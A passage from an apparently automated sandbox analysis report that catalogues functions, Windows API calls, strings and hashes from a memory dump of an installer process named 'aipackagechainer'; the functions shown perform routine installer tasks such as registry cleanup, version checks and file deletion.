Opcode Fuzzy Hash: 3c04a01b91aa2f64aaf92fcd0d41d10fd6e023bb0c6a13accef97cfb901419ef
Instruction Fuzzy Hash: 14918B71A00A09CBDB20DFA8CC48BAEB7F5FF59325F148269E855AB291D7759D00CB90

Function 0007FB80 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 100libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,D11C52E5,Function_00069AFA,00000000,?,Function_0008C250,000000FF,?,0007FACB,?), ref: 0007FBB9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 0007FBC9
GetModuleHandleW.KERNEL32(Advapi32.dll,D11C52E5,Function_00069AFA,00000000,?,Function_0008C250,000000FF,?,0007FACB,?), ref: 0007FC29
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0007FC39

Strings

RegDeleteKeyExW, xrefs: 0007FC33
Advapi32.dll, xrefs: 0007FBB4, 0007FC24
RegDeleteKeyTransactedW, xrefs: 0007FBC3

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 1646373207-1053001802
Opcode ID: ceba81071d965340ad6aef870e35ac359f0eeb94db10082da654fed20caa56dd
Instruction ID: d78688fa7b9f2936873d981f6f9c85231f5baf097f158af28a79bb1529e88997
Opcode Fuzzy Hash: ceba81071d965340ad6aef870e35ac359f0eeb94db10082da654fed20caa56dd
Instruction Fuzzy Hash: B831D872A08249FFEB218F59ED40FA9BBE4E748720F10813AED05D3690DB7A5490DB94

Function 0008D5C0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,?,?,?,00129AFC), ref: 0008D5D0
LoadLibraryW.KERNEL32(Shell32.dll,?,?,00129AFC), ref: 0008D5E3
GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0008D5F3
SHGetPathFromIDListW.SHELL32(?,00000000), ref: 0008D67C
SHGetMalloc.SHELL32(?), ref: 0008D6BE

Strings

Shell32.dll, xrefs: 0008D5DE
SHGetSpecialFolderPathW, xrefs: 0008D5ED

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AddressFolderFromLibraryListLoadLocationMallocPathProcSpecial
String ID: SHGetSpecialFolderPathW$Shell32.dll
API String ID: 2352187698-2988203397
Opcode ID: fd58378efd438460de199303f45311427a96f3c3d91e36723ba835eec3b48914
Instruction ID: e36b8eecf2e1f8aa054c7f0c5d58709555775ad7d2674bd305359c23d917f7ca
Opcode Fuzzy Hash: fd58378efd438460de199303f45311427a96f3c3d91e36723ba835eec3b48914
Instruction Fuzzy Hash: A231E431600301ABEB24AF28DC45B6B77F5BFD4720F54846EE489871D0FBB59895CB91

Function 0008D290 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 96fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0008CD60: SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,D11C52E5,00000000,00000000,?), ref: 0008CDBB

GetFileVersionInfoSizeW.VERSION(?,00000000,Shlwapi.dll,D11C52E5,00000000,?,?,?,?,00000000,000F3AC5,000000FF,Shlwapi.dll,0008D246,?), ref: 0008D2DD
GetFileVersionInfoW.VERSION(?,00000000,000F3AC5,?,00000000,?,?,00000000,000F3AC5,000000FF,Shlwapi.dll,0008D246,?), ref: 0008D309
VerQueryValueW.VERSION(?,0010C404,000000FF,?,?,?,00000000,000F3AC5,000000FF,Shlwapi.dll,0008D246,?), ref: 0008D321
GetLastError.KERNEL32(?,?,00000000,000F3AC5,000000FF,Shlwapi.dll,0008D246,?), ref: 0008D34E
DeleteFileW.KERNEL32(?), ref: 0008D361

Strings

Shlwapi.dll, xrefs: 0008D290, 0008D2C8
p1Wu, xrefs: 0008D361

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: File$InfoVersion$DeleteErrorFolderLastPathQuerySizeValue
String ID: Shlwapi.dll$p1Wu
API String ID: 1753006064-65368398
Opcode ID: 2a4365ad3081ab078e136752583a7beb82ec883c8994ac6d2dfcf37fa4de4575
Instruction ID: d21623896b83ee2ea72545354afd30b22d216e8efe7e99fbe8fcd7f4a6b5f7fc
Opcode Fuzzy Hash: 2a4365ad3081ab078e136752583a7beb82ec883c8994ac6d2dfcf37fa4de4575
Instruction Fuzzy Hash: 51315EB1900249EBDB11DFA5DD44BEEBBF8FF08710F14426AE845A3291DB349B44CBA5

Function 00074510 Relevance: 12.2, APIs: 8, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

GetErrorInfo.OLEAUT32(00000000,00000000,D11C52E5,?,?), ref: 0007457C
SysStringLen.OLEAUT32(00000000), ref: 0007465F
GetProcessHeap.KERNEL32(-000000FF,?), ref: 000746A8
HeapFree.KERNEL32(00000000,-000000FF,?), ref: 000746AE
GetProcessHeap.KERNEL32(-000000FF,00000000,?,00000000,00000000,00000000,D11C52E5,?,?), ref: 000746DB
HeapFree.KERNEL32(00000000,-000000FF,00000000,?,00000000,00000000,00000000,D11C52E5,?,?), ref: 000746E1
SysFreeString.OLEAUT32(00000000), ref: 000746F9
SetErrorInfo.OLEAUT32(00000000,00000000,?), ref: 000747A6

Part of subcall function 00074040: GetProcessHeap.KERNEL32(00074793,00074793), ref: 0007417D
Part of subcall function 00074040: HeapFree.KERNEL32(00000000,00074793,00074793), ref: 00074183
Part of subcall function 00074040: GetProcessHeap.KERNEL32(00074694,?), ref: 000741B7
Part of subcall function 00074040: HeapFree.KERNEL32(00000000,00074694,?), ref: 000741BD

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Heap$Free$Process$ErrorInfoString
String ID:
API String ID: 976288773-0
Opcode ID: 1a67eb6d64b82bb204aa7a6cd9006c7a6eb8cffec81057dd5354f3bde1067aea
Instruction ID: d75522f2233efdd28357f761eb40d3374ad92248f01342237d4fd88682efa86e
Opcode Fuzzy Hash: 1a67eb6d64b82bb204aa7a6cd9006c7a6eb8cffec81057dd5354f3bde1067aea
Instruction Fuzzy Hash: 9A919070D04249DBDB14DFA8C945BEEBBF8EF05310F148159E818AB2D2DB789E04CBA5

Function 000CA278 Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,000CA422), ref: 000CA29C
HeapAlloc.KERNEL32(00000000,?,000CA422), ref: 000CA2A3

Part of subcall function 000CA36E: IsProcessorFeaturePresent.KERNEL32(0000000C,000CA28A,00000000,?,000CA422), ref: 000CA370

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,000CA422), ref: 000CA2B3
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,000CA422), ref: 000CA2DA
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,000CA422), ref: 000CA2EE
InterlockedPopEntrySList.KERNEL32(00000000,?,000CA422), ref: 000CA301
VirtualFree.KERNEL32(00000000,00000000,00008000,?,000CA422), ref: 000CA314

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: 823b3a2411be797495e316391a753d35b71efa8b829da72ab5e2186e59520cc3
Instruction ID: 70ee411afd36fc5e4c1c59488dce0154661d9095fd1053688fee60ddbe030b76
Opcode Fuzzy Hash: 823b3a2411be797495e316391a753d35b71efa8b829da72ab5e2186e59520cc3
Instruction Fuzzy Hash: 201134317052A9BBFB310B68EC08F7E769DEB06789F200428FA01D6570DA25CC81D7A2

Function 0007F3F0 Relevance: 10.8, APIs: 7, Instructions: 347stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0007FCC0: CharNextW.USER32(?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?,?), ref: 0007FCFB
Part of subcall function 0007FCC0: CharNextW.USER32(00000001,?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?), ref: 0007FD1B
Part of subcall function 0007FCC0: CharNextW.USER32(00000000,?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?), ref: 0007FD2B
Part of subcall function 0007FCC0: CharNextW.USER32(00000027,?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?), ref: 0007FD34
Part of subcall function 0007FCC0: CharNextW.USER32(?,?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?), ref: 0007FDA0

lstrcmpiW.KERNEL32(?,0010D51C,?,D11C52E5,?,00000000,00000000), ref: 0007F477
lstrcmpiW.KERNEL32(?,0010C41C), ref: 0007F48E
VarUI4FromStr.OLEAUT32(?,00000000,00000000,?), ref: 0007F6E4
CharNextW.USER32(?,?), ref: 0007F7D5
CharNextW.USER32(00000000), ref: 0007F7EB

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CharNext$lstrcmpi$From
String ID:
API String ID: 298784196-0
Opcode ID: 607ff9bac9259f78a484bae24571d5d863968b6ee4ebd7603feae2f134a8d3e1
Instruction ID: 3e02748a4998f4f504445b660583f25394875ee52d2d01c5194bb105627f159c
Opcode Fuzzy Hash: 607ff9bac9259f78a484bae24571d5d863968b6ee4ebd7603feae2f134a8d3e1
Instruction Fuzzy Hash: 8ED1BD71D0024ADBDB74DF64CC84BFE77B4AB08300F108179E959AB291EB78AA45CB59

Function 0008A3B0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 340COMMON

Download Yara Rule

APIs

SymGetLineFromAddr.DBGHELP(?,?,?,00000002,D11C52E5), ref: 0008A45E

Part of subcall function 00089E10: LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 00089E6E
Part of subcall function 00089E10: GetProcAddress.KERNEL32(00000000), ref: 00089E75

Strings

-----, xrefs: 0008A80C
[0x%.8Ix] , xrefs: 0008A737
%hs(), xrefs: 0008A7E6
-> , xrefs: 0008A8C3
%hs:%ld, xrefs: 0008A5FB

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AddrAddressFromLibraryLineLoadProc
String ID: -> $%hs()$%hs:%ld$-----$[0x%.8Ix]
API String ID: 2196328783-2864510326
Opcode ID: 14efafdd23e0ebf8e92090891bafe56d793e59bbbc03977c12b447ac230c26d8
Instruction ID: 419c2040dd5b3d0e43d450088ee725f70d0dee906fd9a52756889783289c06f6
Opcode Fuzzy Hash: 14efafdd23e0ebf8e92090891bafe56d793e59bbbc03977c12b447ac230c26d8
Instruction Fuzzy Hash: 7CE19D70D002689AEB24DF64CC98BDEB7B5FF45314F1042DAE509A7681DBB85B84CF91

Function 0008E4A0 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 327COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000080,00000001,Close,50000001,?,00000128,?,00000032,0000000E,00000082,000001F5,?,50000000,?,00000026), ref: 0008E78B
DialogBoxIndirectParamW.USER32(00000000,00000000,?,0008E8D0,?), ref: 0008E7DA

Strings

Details >>, xrefs: 0008E711
Send Error Report, xrefs: 0008E6ED
Close, xrefs: 0008E6A4
Copy, xrefs: 0008E772

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: DialogHandleIndirectModuleParam
String ID: Close$Copy$Details >>$Send Error Report
API String ID: 279259766-113472931
Opcode ID: 149eb465d3494d6b881d5c2130ad1314437f27b0ca482edd543acdcd7b2fb8f6
Instruction ID: 3581514ffa5eee13a93a8919e58344ad8221b168be05a6e7a5c8e35a9cd56eb7
Opcode Fuzzy Hash: 149eb465d3494d6b881d5c2130ad1314437f27b0ca482edd543acdcd7b2fb8f6
Instruction Fuzzy Hash: D4C1AC70A40645EBEB24DF64CC56BEEB7B5FF08714F104229F551AB2C1EBB0AA01CB90

Function 000A6930 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 245fileCOMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 000A6964

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

DeleteFileW.KERNEL32(?), ref: 000A6A09
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 000A6B3C

Part of subcall function 00086B20: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,D11C52E5,00000001,7568EB20,00000000), ref: 00086B6F
Part of subcall function 00086B20: ReadFile.KERNEL32(00000000,?,000003FF,?,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000,D11C52E5,00000001,7568EB20,00000000), ref: 00086BA0

Part of subcall function 00087AB0: LoadStringW.USER32(000000F5,?,00000514,D11C52E5), ref: 00087B06

_wcsrchr.LIBVCRUNTIME ref: 000A6A78

Strings

--verbose --log-file="%s" --remove-pack-file "%s" "%s", xrefs: 000A69BE
p1Wu, xrefs: 000A6A09, 000A6B3C

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: File$Delete_wcsrchr$CreateHeapLoadProcessReadString
String ID: --verbose --log-file="%s" --remove-pack-file "%s" "%s"$p1Wu
API String ID: 2917987377-1893047046
Opcode ID: 483e32bb7e197249d1af9f77790bc2b748d1d74df739b9abae155860a3fb5319
Instruction ID: bc0ac50bd091784467f6c5a9d0986e6f649fe51f35a6c5df88a6c17372ec361a
Opcode Fuzzy Hash: 483e32bb7e197249d1af9f77790bc2b748d1d74df739b9abae155860a3fb5319
Instruction Fuzzy Hash: 1E91A171A006499FDB00DFA8C844B9EBBF5FF55324F1882A9E415DB2A2DB35DD04CBA1

Function 000A5EC0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,D11C52E5), ref: 000A5EF4

Part of subcall function 000840A0: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,?,?,0009124D,0010ED54,?,?,?,?,00000000), ref: 000840B8
Part of subcall function 000840A0: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,D11C52E5,-00000001,?,?,?,0009124D,0010ED54,?,?,?,?,00000000), ref: 000840EA

Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA

Strings

p2Wu3Wu, xrefs: 000A6498, 000A65CA, 000A6644
*.*, xrefs: 000A5F6A, 000A5F7C, 000A5F84
.jar, xrefs: 000A635C
.pack, xrefs: 000A6211
2Wup1Wu, xrefs: 000A65A6

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapObjectSingleWait
String ID: 2Wup1Wu$*.*$.jar$.pack$p2Wu3Wu
API String ID: 2019434529-3473399590
Opcode ID: 7b1e39d54c74ad7fe30725236e3c9d0f862a40b7d2216b93a23f36cd221de1f9
Instruction ID: 40cd933b6212bf8f91a184f80f718ba5aa00a1e55072f843e032c914784a88db
Opcode Fuzzy Hash: 7b1e39d54c74ad7fe30725236e3c9d0f862a40b7d2216b93a23f36cd221de1f9
Instruction Fuzzy Hash: 2E517D70A00A4ADFDB10DFA9C948BAEF7F4FF05325F144269E425AB292DB35D944CB90

Function 000A99A0 Relevance: 10.6, APIs: 7, Instructions: 125COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 000A99ED
GetForegroundWindow.USER32 ref: 000A99F9
SetLastError.KERNEL32(0000000E,?,?,?,D11C52E5), ref: 000A9A40

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$ActiveErrorForegroundLast
String ID:
API String ID: 1822391280-0
Opcode ID: 5eaccc3291b9d6155aa3e0d6bce59932de66f1ae754f88d91dfb809795b2661b
Instruction ID: 126db74e3e469da440b1fd0205980c5bf751e75f7f3a592dc6c16e16669c3d3e
Opcode Fuzzy Hash: 5eaccc3291b9d6155aa3e0d6bce59932de66f1ae754f88d91dfb809795b2661b
Instruction Fuzzy Hash: 1841F532904249EFDB11CFA4DC44BDEBBB8FF16310F10822AE801A7691DB75A904CBD1

Function 000CE120 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 000CE157
___except_validate_context_record.LIBVCRUNTIME ref: 000CE15F
_ValidateLocalCookies.LIBCMT ref: 000CE1E8
__IsNonwritableInCurrentImage.LIBCMT ref: 000CE213
_ValidateLocalCookies.LIBCMT ref: 000CE268

Strings

csm, xrefs: 000CE1FD

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e0a965a1dfb33d21266c636e568a3a3afa0710f7b619de2db3bd9cf431596cad
Instruction ID: f4078b0d678b88379d7a7214f7d5ba042689589bc4d5e27c4b80a289afbdb2ab
Opcode Fuzzy Hash: e0a965a1dfb33d21266c636e568a3a3afa0710f7b619de2db3bd9cf431596cad
Instruction Fuzzy Hash: 5F41B134A00299ABCF10DFA8C884BEE7BE5AF05314F148169FD149B392C731AA65CB91

Function 000A90D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,00000024), ref: 000A9160
GetWindowLongW.USER32(?,000000FC), ref: 000A9175
CallWindowProcW.USER32(?,?,00000082,?,00000024), ref: 000A918B
GetWindowLongW.USER32(?,000000FC), ref: 000A91A5
SetWindowLongW.USER32(?,000000FC,?), ref: 000A91B5

Strings

$, xrefs: 000A9109

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: 15e1636e64103bec3afc771b1e5f87fc9a47a6aeb353c6941572f0e86ffd3a8f
Instruction ID: 221ee81a20b743d70a5b608f57dcbd0ff881a91d2f2418e6e822c6420e1ce30d
Opcode Fuzzy Hash: 15e1636e64103bec3afc771b1e5f87fc9a47a6aeb353c6941572f0e86ffd3a8f
Instruction Fuzzy Hash: DB411271608740AFD760DF59C888A1BBBF5FF89720F504A1DF596836A0C772E944CB92

Function 0008D1B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Shlwapi.dll,?,00000000,?,?,?,?,?,?,000905D4,?), ref: 0008D1CB
GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 0008D1E1
FreeLibrary.KERNEL32(00000000), ref: 0008D21A
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,000905D4,?), ref: 0008D236

Strings

DllGetVersion, xrefs: 0008D1DB
Shlwapi.dll, xrefs: 0008D1CA

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Library$Free$AddressLoadProc
String ID: DllGetVersion$Shlwapi.dll
API String ID: 1386263645-2240825258
Opcode ID: 972150275b81bbe7091e85b92633375ae1ff032d956006bf9397a3216b161d1f
Instruction ID: bb4f62e70e8e4dcc57bad73fc93cc40b6bfa630992d5444f2b17f91697d54cf1
Opcode Fuzzy Hash: 972150275b81bbe7091e85b92633375ae1ff032d956006bf9397a3216b161d1f
Instruction Fuzzy Hash: 2F2192726043158BD304AF29E881A7BB7E4BFE9711F80066EF489C7251EB35D84487A3

Function 000C5D30 Relevance: 10.6, APIs: 7, Instructions: 76COMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?), ref: 000C5D54
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 000C5D64
GetLastError.KERNEL32 ref: 000C5D74
CloseHandle.KERNEL32(?), ref: 000C5D9A
GetLastError.KERNEL32 ref: 000C5DA4
CreateSemaphoreW.KERNEL32(00000000,00000000,00000003,00000000), ref: 000C5DC5
GetLastError.KERNEL32 ref: 000C5DD2

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$CreateEvent$CloseHandleResetSemaphore
String ID:
API String ID: 3310109588-0
Opcode ID: a1567ef913e73cffd40f2e809fecf594def0eafa8f6a0a334ca1a808252df65a
Instruction ID: ec69b1ae8f3c106d920884e13e0747995aca7318d95f4521baf5ae55ea5fde6f
Opcode Fuzzy Hash: a1567ef913e73cffd40f2e809fecf594def0eafa8f6a0a334ca1a808252df65a
Instruction Fuzzy Hash: 33213E74300B029BFB745F65DC58B6A77E8AF44746F10442CE956DA690E7B4F8809B60

Function 000DD957 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

